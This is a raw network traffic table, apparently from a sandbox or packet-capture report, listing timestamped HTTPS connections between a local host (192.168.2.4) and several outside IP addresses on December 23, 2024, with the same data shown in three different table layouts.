                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.999771118 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.999804020 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.999850035 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.999878883 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.999897957 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.999921083 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:13.018178940 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:13.018205881 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:13.018260956 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:13.018296003 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:13.018312931 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:13.018341064 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:13.104051113 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:13.104079008 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:13.104180098 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:13.104269028 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:13.104331970 CET49778443192.168.2.4185.199.109.133
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Dec 23, 2024 09:01:13.118168116 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.118199110 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.118347883 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:13.118380070 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.118422031 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:13.131299019 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.131328106 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.131426096 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:13.131444931 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.131494999 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:13.142132998 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.142152071 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.142221928 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:13.142251968 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.142302036 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:13.153666019 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.153701067 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.153831005 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:13.153857946 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.153903961 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:13.164483070 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.164505005 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.164634943 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:13.164654016 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.164701939 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:13.175776005 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.175800085 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.175870895 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:13.175904989 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.175951958 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:13.187242985 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.187263012 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.187361002 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:13.187391043 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.187448978 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:13.222462893 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:13.297209024 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.297255039 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.297424078 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:13.297466040 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.297518015 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:13.305319071 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.305342913 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.305419922 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:13.305453062 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.305496931 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:13.312263012 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.312308073 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.312385082 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:13.312416077 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.312434912 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:13.312459946 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:13.319823027 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.319850922 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.319901943 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:13.319914103 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.319930077 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:13.319957972 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:13.327142954 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.327172995 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.327282906 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:13.327294111 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.327361107 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:13.331059933 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.331119061 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.331162930 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:13.331176043 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.331223011 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:13.336585045 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:13.338809013 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.338844061 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.338891983 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:13.338900089 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.338952065 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:13.338969946 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:13.346023083 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.346048117 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.346127033 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:13.346141100 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.346187115 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:13.349241018 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.349323988 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:13.349334002 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.349350929 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:13.349402905 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:13.353862047 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:14.573019028 CET  49789        443        192.168.2.4      149.154.167.99
Dec 23, 2024 09:01:14.573065042 CET  443          49789      149.154.167.99   192.168.2.4
Dec 23, 2024 09:01:14.573142052 CET  49789        443        192.168.2.4      149.154.167.99
Dec 23, 2024 09:01:14.583085060 CET  49789        443        192.168.2.4      149.154.167.99
Dec 23, 2024 09:01:14.583098888 CET  443          49789      149.154.167.99   192.168.2.4
Dec 23, 2024 09:01:15.948323965 CET  443          49789      149.154.167.99   192.168.2.4
Dec 23, 2024 09:01:15.948441982 CET  49789        443        192.168.2.4      149.154.167.99
Dec 23, 2024 09:01:15.999501944 CET  49789        443        192.168.2.4      149.154.167.99
Dec 23, 2024 09:01:15.999531984 CET  443          49789      149.154.167.99   192.168.2.4
Dec 23, 2024 09:01:15.999919891 CET  443          49789      149.154.167.99   192.168.2.4
Dec 23, 2024 09:01:15.999975920 CET  49789        443        192.168.2.4      149.154.167.99
Dec 23, 2024 09:01:16.002501965 CET  49789        443        192.168.2.4      149.154.167.99
Dec 23, 2024 09:01:16.043371916 CET  443          49789      149.154.167.99   192.168.2.4
Dec 23, 2024 09:01:16.485937119 CET  443          49789      149.154.167.99   192.168.2.4
Dec 23, 2024 09:01:16.485971928 CET  443          49789      149.154.167.99   192.168.2.4
Dec 23, 2024 09:01:16.485990047 CET  49789        443        192.168.2.4      149.154.167.99
Dec 23, 2024 09:01:16.486002922 CET  443          49789      149.154.167.99   192.168.2.4
Dec 23, 2024 09:01:16.486021996 CET  49789        443        192.168.2.4      149.154.167.99
Dec 23, 2024 09:01:16.486042976 CET  443          49789      149.154.167.99   192.168.2.4
Dec 23, 2024 09:01:16.486061096 CET  49789        443        192.168.2.4      149.154.167.99
Dec 23, 2024 09:01:16.486124992 CET  49789        443        192.168.2.4      149.154.167.99
Dec 23, 2024 09:01:16.501142979 CET  49789        443        192.168.2.4      149.154.167.99
Dec 23, 2024 09:01:16.501163960 CET  443          49789      149.154.167.99   192.168.2.4
Dec 23, 2024 09:01:16.655890942 CET  49795        443        192.168.2.4      104.102.49.254
Dec 23, 2024 09:01:16.655937910 CET  443          49795      104.102.49.254   192.168.2.4
Dec 23, 2024 09:01:16.656106949 CET  49795        443        192.168.2.4      104.102.49.254
Dec 23, 2024 09:01:16.656436920 CET  49795        443        192.168.2.4      104.102.49.254
Dec 23, 2024 09:01:16.656449080 CET  443          49795      104.102.49.254   192.168.2.4
Dec 23, 2024 09:01:18.042383909 CET  443          49795      104.102.49.254   192.168.2.4
Dec 23, 2024 09:01:18.042460918 CET  49795        443        192.168.2.4      104.102.49.254
Dec 23, 2024 09:01:18.094584942 CET  49795        443        192.168.2.4      104.102.49.254
Dec 23, 2024 09:01:18.094602108 CET  443          49795      104.102.49.254   192.168.2.4
Dec 23, 2024 09:01:18.095101118 CET  443          49795      104.102.49.254   192.168.2.4
Dec 23, 2024 09:01:18.095170021 CET  49795        443        192.168.2.4      104.102.49.254
Dec 23, 2024 09:01:18.095976114 CET  49795        443        192.168.2.4      104.102.49.254
Dec 23, 2024 09:01:18.139344931 CET  443          49795      104.102.49.254   192.168.2.4
Dec 23, 2024 09:01:18.906986952 CET  443          49795      104.102.49.254   192.168.2.4
Dec 23, 2024 09:01:18.907015085 CET  443          49795      104.102.49.254   192.168.2.4
Dec 23, 2024 09:01:18.907098055 CET  443          49795      104.102.49.254   192.168.2.4
Dec 23, 2024 09:01:18.907186031 CET  49795        443        192.168.2.4      104.102.49.254
Dec 23, 2024 09:01:18.907206059 CET  443          49795      104.102.49.254   192.168.2.4
Dec 23, 2024 09:01:18.907252073 CET  49795        443        192.168.2.4      104.102.49.254
Dec 23, 2024 09:01:18.907252073 CET  49795        443        192.168.2.4      104.102.49.254
Dec 23, 2024 09:01:19.014714003 CET  443          49795      104.102.49.254   192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:19.014754057 CET44349795104.102.49.254192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:19.014893055 CET49795443192.168.2.4104.102.49.254
                                                                                                                                                                                                                    Dec 23, 2024 09:01:19.014918089 CET44349795104.102.49.254192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:19.014971018 CET49795443192.168.2.4104.102.49.254
                                                                                                                                                                                                                    Dec 23, 2024 09:01:19.029635906 CET44349795104.102.49.254192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:19.029733896 CET49795443192.168.2.4104.102.49.254
                                                                                                                                                                                                                    Dec 23, 2024 09:01:19.029743910 CET44349795104.102.49.254192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:19.029783010 CET44349795104.102.49.254192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:19.029792070 CET49795443192.168.2.4104.102.49.254
                                                                                                                                                                                                                    Dec 23, 2024 09:01:19.029881001 CET49795443192.168.2.4104.102.49.254
                                                                                                                                                                                                                    Dec 23, 2024 09:01:19.030208111 CET49795443192.168.2.4104.102.49.254
                                                                                                                                                                                                                    Dec 23, 2024 09:01:19.030226946 CET44349795104.102.49.254192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:19.059824944 CET49801443192.168.2.437.27.43.98
                                                                                                                                                                                                                    Dec 23, 2024 09:01:19.059895039 CET4434980137.27.43.98192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:19.060003996 CET49801443192.168.2.437.27.43.98
                                                                                                                                                                                                                    Dec 23, 2024 09:01:19.060411930 CET49801443192.168.2.437.27.43.98
                                                                                                                                                                                                                    Dec 23, 2024 09:01:19.060456991 CET4434980137.27.43.98192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:51.144550085 CET49801443192.168.2.437.27.43.98
                                                                                                                                                                                                                    Dec 23, 2024 09:01:51.156426907 CET49869443192.168.2.4149.154.167.99
                                                                                                                                                                                                                    Dec 23, 2024 09:01:51.156465054 CET44349869149.154.167.99192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:51.156600952 CET49869443192.168.2.4149.154.167.99
                                                                                                                                                                                                                    Dec 23, 2024 09:01:51.156781912 CET49869443192.168.2.4149.154.167.99
                                                                                                                                                                                                                    Dec 23, 2024 09:01:51.156795979 CET44349869149.154.167.99192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:52.519237041 CET44349869149.154.167.99192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:52.519330025 CET49869443192.168.2.4149.154.167.99
                                                                                                                                                                                                                    Dec 23, 2024 09:01:52.520109892 CET49869443192.168.2.4149.154.167.99
                                                                                                                                                                                                                    Dec 23, 2024 09:01:52.520123005 CET44349869149.154.167.99192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:52.525614977 CET49869443192.168.2.4149.154.167.99
                                                                                                                                                                                                                    Dec 23, 2024 09:01:52.525624990 CET44349869149.154.167.99192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:53.131547928 CET44349869149.154.167.99192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:53.131582022 CET44349869149.154.167.99192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:53.131627083 CET44349869149.154.167.99192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:53.131643057 CET49869443192.168.2.4149.154.167.99
                                                                                                                                                                                                                    Dec 23, 2024 09:01:53.131659031 CET44349869149.154.167.99192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:53.131675959 CET49869443192.168.2.4149.154.167.99
                                                                                                                                                                                                                    Dec 23, 2024 09:01:53.131696939 CET44349869149.154.167.99192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:53.131730080 CET49869443192.168.2.4149.154.167.99
                                                                                                                                                                                                                    Dec 23, 2024 09:01:53.131757975 CET49869443192.168.2.4149.154.167.99
                                                                                                                                                                                                                    Dec 23, 2024 09:01:53.132113934 CET49869443192.168.2.4149.154.167.99
                                                                                                                                                                                                                    Dec 23, 2024 09:01:53.132138014 CET44349869149.154.167.99192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:53.148478985 CET49874443192.168.2.4104.102.49.254
                                                                                                                                                                                                                    Dec 23, 2024 09:01:53.148511887 CET44349874104.102.49.254192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:53.148598909 CET49874443192.168.2.4104.102.49.254
                                                                                                                                                                                                                    Dec 23, 2024 09:01:53.148881912 CET49874443192.168.2.4104.102.49.254
                                                                                                                                                                                                                    Dec 23, 2024 09:01:53.148894072 CET44349874104.102.49.254192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:54.529530048 CET44349874104.102.49.254192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:54.529777050 CET49874443192.168.2.4104.102.49.254
                                                                                                                                                                                                                    Dec 23, 2024 09:01:54.530334949 CET49874443192.168.2.4104.102.49.254
                                                                                                                                                                                                                    Dec 23, 2024 09:01:54.530344009 CET44349874104.102.49.254192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:54.532092094 CET49874443192.168.2.4104.102.49.254
                                                                                                                                                                                                                    Dec 23, 2024 09:01:54.532097101 CET44349874104.102.49.254192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:55.307549000 CET44349874104.102.49.254192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:55.307594061 CET44349874104.102.49.254192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:55.307615995 CET44349874104.102.49.254192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:55.307625055 CET49874443192.168.2.4104.102.49.254
                                                                                                                                                                                                                    Dec 23, 2024 09:01:55.307640076 CET44349874104.102.49.254192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:55.307653904 CET49874443192.168.2.4104.102.49.254
                                                                                                                                                                                                                    Dec 23, 2024 09:01:55.307678938 CET49874443192.168.2.4104.102.49.254
                                                                                                                                                                                                                    Dec 23, 2024 09:01:55.307689905 CET49874443192.168.2.4104.102.49.254
                                                                                                                                                                                                                    Dec 23, 2024 09:01:55.508533955 CET44349874104.102.49.254192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:55.508573055 CET44349874104.102.49.254192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:55.508652925 CET49874443192.168.2.4104.102.49.254
                                                                                                                                                                                                                    Dec 23, 2024 09:01:55.508668900 CET44349874104.102.49.254192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:55.508708954 CET49874443192.168.2.4104.102.49.254
                                                                                                                                                                                                                    Dec 23, 2024 09:01:55.516271114 CET44349874104.102.49.254192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:55.516331911 CET49874443192.168.2.4104.102.49.254
                                                                                                                                                                                                                    Dec 23, 2024 09:01:55.516338110 CET44349874104.102.49.254192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:55.516376019 CET49874443192.168.2.4104.102.49.254
                                                                                                                                                                                                                    Dec 23, 2024 09:01:55.516741037 CET49874443192.168.2.4104.102.49.254
                                                                                                                                                                                                                    Dec 23, 2024 09:01:55.516777992 CET44349874104.102.49.254192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:55.516905069 CET49874443192.168.2.4104.102.49.254
                                                                                                                                                                                                                    Dec 23, 2024 09:01:55.557723999 CET49880443192.168.2.437.27.43.98
                                                                                                                                                                                                                    Dec 23, 2024 09:01:55.557754993 CET4434988037.27.43.98192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:55.557813883 CET49880443192.168.2.437.27.43.98
                                                                                                                                                                                                                    Dec 23, 2024 09:01:55.558435917 CET49880443192.168.2.437.27.43.98
                                                                                                                                                                                                                    Dec 23, 2024 09:01:55.558448076 CET4434988037.27.43.98192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:02:27.809320927 CET49880443192.168.2.437.27.43.98
                                                                                                                                                                                                                    Dec 23, 2024 09:02:27.829161882 CET49952443192.168.2.4149.154.167.99
                                                                                                                                                                                                                    Dec 23, 2024 09:02:27.829288006 CET44349952149.154.167.99192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:02:27.829386950 CET49952443192.168.2.4149.154.167.99
                                                                                                                                                                                                                    Dec 23, 2024 09:02:27.829938889 CET49952443192.168.2.4149.154.167.99
                                                                                                                                                                                                                    Dec 23, 2024 09:02:27.829971075 CET44349952149.154.167.99192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:02:29.192104101 CET44349952149.154.167.99192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:02:29.192264080 CET49952443192.168.2.4149.154.167.99
                                                                                                                                                                                                                    Dec 23, 2024 09:02:29.192796946 CET49952443192.168.2.4149.154.167.99
                                                                                                                                                                                                                    Dec 23, 2024 09:02:29.192827940 CET44349952149.154.167.99192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:02:29.194694042 CET49952443192.168.2.4149.154.167.99
                                                                                                                                                                                                                    Dec 23, 2024 09:02:29.194730043 CET44349952149.154.167.99192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:02:29.737186909 CET44349952149.154.167.99192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:02:29.737220049 CET44349952149.154.167.99192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:02:29.737299919 CET44349952149.154.167.99192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:02:29.737346888 CET44349952149.154.167.99192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:02:29.737428904 CET49952443192.168.2.4149.154.167.99
                                                                                                                                                                                                                    Dec 23, 2024 09:02:29.737507105 CET49952443192.168.2.4149.154.167.99
                                                                                                                                                                                                                    Dec 23, 2024 09:02:29.737632990 CET49952443192.168.2.4149.154.167.99
                                                                                                                                                                                                                    Dec 23, 2024 09:02:29.737664938 CET44349952149.154.167.99192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:02:29.762892962 CET49958443192.168.2.4104.102.49.254
                                                                                                                                                                                                                    Dec 23, 2024 09:02:29.762932062 CET44349958104.102.49.254192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:02:29.763021946 CET49958443192.168.2.4104.102.49.254
Dec 23, 2024 09:02:29.763262033 CET | 49958 | 443 | 192.168.2.4 | 104.102.49.254
Dec 23, 2024 09:02:29.763273954 CET | 443 | 49958 | 104.102.49.254 | 192.168.2.4
Dec 23, 2024 09:02:31.143450022 CET | 443 | 49958 | 104.102.49.254 | 192.168.2.4
Dec 23, 2024 09:02:31.143542051 CET | 49958 | 443 | 192.168.2.4 | 104.102.49.254
Dec 23, 2024 09:02:31.147228003 CET | 49958 | 443 | 192.168.2.4 | 104.102.49.254
Dec 23, 2024 09:02:31.147233009 CET | 443 | 49958 | 104.102.49.254 | 192.168.2.4
Dec 23, 2024 09:02:31.147491932 CET | 443 | 49958 | 104.102.49.254 | 192.168.2.4
Dec 23, 2024 09:02:31.147546053 CET | 49958 | 443 | 192.168.2.4 | 104.102.49.254
Dec 23, 2024 09:02:31.148027897 CET | 49958 | 443 | 192.168.2.4 | 104.102.49.254
Dec 23, 2024 09:02:31.191323042 CET | 443 | 49958 | 104.102.49.254 | 192.168.2.4
Dec 23, 2024 09:02:31.993381977 CET | 443 | 49958 | 104.102.49.254 | 192.168.2.4
Dec 23, 2024 09:02:31.993453026 CET | 443 | 49958 | 104.102.49.254 | 192.168.2.4
Dec 23, 2024 09:02:31.993493080 CET | 49958 | 443 | 192.168.2.4 | 104.102.49.254
Dec 23, 2024 09:02:31.993494034 CET | 443 | 49958 | 104.102.49.254 | 192.168.2.4
Dec 23, 2024 09:02:31.993519068 CET | 443 | 49958 | 104.102.49.254 | 192.168.2.4
Dec 23, 2024 09:02:31.993551016 CET | 49958 | 443 | 192.168.2.4 | 104.102.49.254
Dec 23, 2024 09:02:31.993583918 CET | 49958 | 443 | 192.168.2.4 | 104.102.49.254
Dec 23, 2024 09:02:32.109350920 CET | 443 | 49958 | 104.102.49.254 | 192.168.2.4
Dec 23, 2024 09:02:32.109384060 CET | 443 | 49958 | 104.102.49.254 | 192.168.2.4
Dec 23, 2024 09:02:32.109416008 CET | 49958 | 443 | 192.168.2.4 | 104.102.49.254
Dec 23, 2024 09:02:32.109427929 CET | 443 | 49958 | 104.102.49.254 | 192.168.2.4
Dec 23, 2024 09:02:32.109442949 CET | 49958 | 443 | 192.168.2.4 | 104.102.49.254
Dec 23, 2024 09:02:32.109457970 CET | 49958 | 443 | 192.168.2.4 | 104.102.49.254
Dec 23, 2024 09:02:32.117182970 CET | 443 | 49958 | 104.102.49.254 | 192.168.2.4
Dec 23, 2024 09:02:32.117252111 CET | 49958 | 443 | 192.168.2.4 | 104.102.49.254
Dec 23, 2024 09:02:32.117264032 CET | 443 | 49958 | 104.102.49.254 | 192.168.2.4
Dec 23, 2024 09:02:32.117286921 CET | 443 | 49958 | 104.102.49.254 | 192.168.2.4
Dec 23, 2024 09:02:32.117297888 CET | 49958 | 443 | 192.168.2.4 | 104.102.49.254
Dec 23, 2024 09:02:32.117333889 CET | 49958 | 443 | 192.168.2.4 | 104.102.49.254
Dec 23, 2024 09:02:32.117513895 CET | 49958 | 443 | 192.168.2.4 | 104.102.49.254
Dec 23, 2024 09:02:32.117530107 CET | 443 | 49958 | 104.102.49.254 | 192.168.2.4
Dec 23, 2024 09:02:32.158862114 CET | 49964 | 443 | 192.168.2.4 | 37.27.43.98
Dec 23, 2024 09:02:32.158916950 CET | 443 | 49964 | 37.27.43.98 | 192.168.2.4
Dec 23, 2024 09:02:32.159010887 CET | 49964 | 443 | 192.168.2.4 | 37.27.43.98
Dec 23, 2024 09:02:32.159468889 CET | 49964 | 443 | 192.168.2.4 | 37.27.43.98
Dec 23, 2024 09:02:32.159485102 CET | 443 | 49964 | 37.27.43.98 | 192.168.2.4
Dec 23, 2024 09:03:04.237595081 CET | 49964 | 443 | 192.168.2.4 | 37.27.43.98
Dec 23, 2024 09:03:04.238982916 CET | 50013 | 443 | 192.168.2.4 | 149.154.167.99
Dec 23, 2024 09:03:04.239053011 CET | 443 | 50013 | 149.154.167.99 | 192.168.2.4
Dec 23, 2024 09:03:04.239144087 CET | 50013 | 443 | 192.168.2.4 | 149.154.167.99
Dec 23, 2024 09:03:04.239382029 CET | 50013 | 443 | 192.168.2.4 | 149.154.167.99
Dec 23, 2024 09:03:04.239398956 CET | 443 | 50013 | 149.154.167.99 | 192.168.2.4
Dec 23, 2024 09:03:05.600368023 CET | 443 | 50013 | 149.154.167.99 | 192.168.2.4
Dec 23, 2024 09:03:05.600431919 CET | 50013 | 443 | 192.168.2.4 | 149.154.167.99
Dec 23, 2024 09:03:05.875339031 CET | 50013 | 443 | 192.168.2.4 | 149.154.167.99
Dec 23, 2024 09:03:05.875369072 CET | 443 | 50013 | 149.154.167.99 | 192.168.2.4
Dec 23, 2024 09:03:05.916120052 CET | 50013 | 443 | 192.168.2.4 | 149.154.167.99
Dec 23, 2024 09:03:05.916136980 CET | 443 | 50013 | 149.154.167.99 | 192.168.2.4
Dec 23, 2024 09:03:06.337898016 CET | 443 | 50013 | 149.154.167.99 | 192.168.2.4
Dec 23, 2024 09:03:06.337929010 CET | 443 | 50013 | 149.154.167.99 | 192.168.2.4
Dec 23, 2024 09:03:06.337968111 CET | 443 | 50013 | 149.154.167.99 | 192.168.2.4
Dec 23, 2024 09:03:06.337980986 CET | 50013 | 443 | 192.168.2.4 | 149.154.167.99
Dec 23, 2024 09:03:06.338001013 CET | 443 | 50013 | 149.154.167.99 | 192.168.2.4
Dec 23, 2024 09:03:06.338011980 CET | 443 | 50013 | 149.154.167.99 | 192.168.2.4
Dec 23, 2024 09:03:06.338018894 CET | 50013 | 443 | 192.168.2.4 | 149.154.167.99
Dec 23, 2024 09:03:06.338129997 CET | 50013 | 443 | 192.168.2.4 | 149.154.167.99
Dec 23, 2024 09:03:06.339431047 CET | 50013 | 443 | 192.168.2.4 | 149.154.167.99
Dec 23, 2024 09:03:06.339451075 CET | 443 | 50013 | 149.154.167.99 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
